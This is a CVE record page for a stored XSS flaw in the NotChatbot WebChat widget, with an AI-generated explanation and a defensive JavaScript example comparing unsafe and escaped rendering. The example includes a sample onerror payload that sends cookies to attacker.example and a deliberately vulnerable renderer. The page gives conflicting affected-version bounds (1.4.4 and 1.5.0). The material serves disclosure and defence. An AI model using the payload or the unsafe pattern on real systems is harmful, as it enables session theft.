CVE-2026-30048
Description
A stored cross-site scripting (XSS) vulnerability exists in the NotChatbot WebChat widget through 1.4.4. User-supplied input is not properly sanitized before being stored and rendered in the chat conversation history. This allows an attacker to inject arbitrary JavaScript code which is executed when the chat history is reloaded. The issue is reproducible across multiple independent implementations of the widget, indicating that the vulnerability resides in the product itself rather than in a specific website configuration.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A stored XSS vulnerability in the NotChatbot WebChat widget through version 1.5.0 allows arbitrary JavaScript execution by injecting un-sanitized payloads into chat history.
Vulnerability Overview
A stored cross-site scripting (XSS) vulnerability exists in the NotChatbot WebChat widget, affecting versions up to and including 1.5.0. The root cause is that user-supplied input is not properly sanitized before being stored and later rendered in the chat conversation history. This allows an attacker to inject arbitrary HTML and JavaScript code, which is executed when the history is reloaded or viewed by another user [1][2][3]. The issue is reproducible across multiple independent implementations, indicating the vulnerability resides in the reusable WebChat component itself rather than in specific website configurations [1].
Attack Vector and Exploitation
An attacker can exploit this vulnerability by sending a chat message containing a malicious HTML/JavaScript payload. The payload is stored on the server and executed in the victim's browser when the conversation history is rendered or reloaded. No special privileges or authentication are required to send messages; any user interacting with the widget can inject the payload [2][3]. The attack is straightforward: load a page that embeds the widget, send the malicious message, and trigger execution by reloading the history [2].
Impact
Successful exploitation allows arbitrary JavaScript execution in the context of the victim's browser. This can lead to session hijacking, information disclosure (e.g., cookies, tokens), and potential account takeover depending on the application's context [2][3]. The impact is amplified because the widget is often embedded in multiple websites, making any site using an affected version potentially vulnerable [1].
Mitigation and Remediation
As of early 2026, the vendor has not released an official patch; the NVD record is not prioritized for enrichment [1]. A suggested fix involves properly sanitizing and escaping user input before rendering, using libraries like DOMPurify, and implementing a Content Security Policy (CSP) to prevent inline script execution [2][3]. Users are advised to temporarily disable the widget or apply output encoding until a patched version is available.
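The following is an added example, not code from NotChatbot or from this CVE's references, which do not include the widget's source. It models the failure mode described above with a hypothetical history renderer: the unsafe version concatenates stored message text straight into markup, so a stored payload becomes live DOM on reload; the hardened version HTML-escapes every untrusted field and whitelists the author value that lands in an attribute. A small detector for triaging an existing history store and an assumed CSP value for the embedding site are included as defence in depth. The history array and the attacker payload in it are constructed for the example.

```javascript
// Added example (hypothetical renderer, not the NotChatbot WebChat code).
// Models stored XSS in a chat history: unsafe vs. escaped rendering.

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Constructed sample history, as a server would return it on reload.
// The third message is a constructed attacker payload that would exfiltrate
// cookies via an inline event handler if rendered as markup.
const HISTORY = [
  { author: "visitor", text: "Hi, I need help with my order" },
  { author: "agent", text: "Sure, what is the order number?" },
  {
    author: "visitor",
    text: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  },
];

// Vulnerable pattern: stored text is interpolated into HTML, so any tag or
// handler in a message becomes live DOM once this string hits innerHTML.
function renderHistoryUnsafe(history) {
  return history.map((m) => `<div class="msg ${m.author}">${m.text}</div>`).join("");
}

// Hardened pattern: message text is escaped, and the author value is
// reduced to a fixed set because it is written into a class attribute.
function renderHistorySafe(history) {
  return history
    .map((m) => {
      const author = m.author === "agent" ? "agent" : "visitor";
      return `<div class="msg ${author}">${escapeHtml(m.text)}</div>`;
    })
    .join("");
}

// Conservative triage check for an existing history store: flags messages
// containing the start of a tag or an inline on*= handler attribute.
const MARKUP_RE = /<\s*[a-z!\/]|\son[a-z]+\s*=/i;
function findSuspiciousMessages(history) {
  return history.filter((m) => MARKUP_RE.test(m.text));
}

// Assumed CSP for the embedding site: no inline scripts or handlers, so a
// missed escape still cannot execute. Sources are placeholders to adapt.
const CSP_HEADER =
  "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

if (typeof require !== "undefined" && require.main === module) {
  console.log(renderHistoryUnsafe(HISTORY));
  console.log(renderHistorySafe(HISTORY));
  console.log(findSuspiciousMessages(HISTORY).length, "suspicious message(s)");
  console.log(CSP_HEADER);
}
```

The escaped output renders the payload as visible text rather than an element, which is the behaviour a patched widget should show; the detector is only a triage aid for existing stored history and is not a substitute for output encoding, since attribute and URL contexts need their own encoding rules.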
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| @developer.notchatbot/webchat | npm | <= 1.5.0 | — |
Affected products
- Range: <= 1.4.4
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.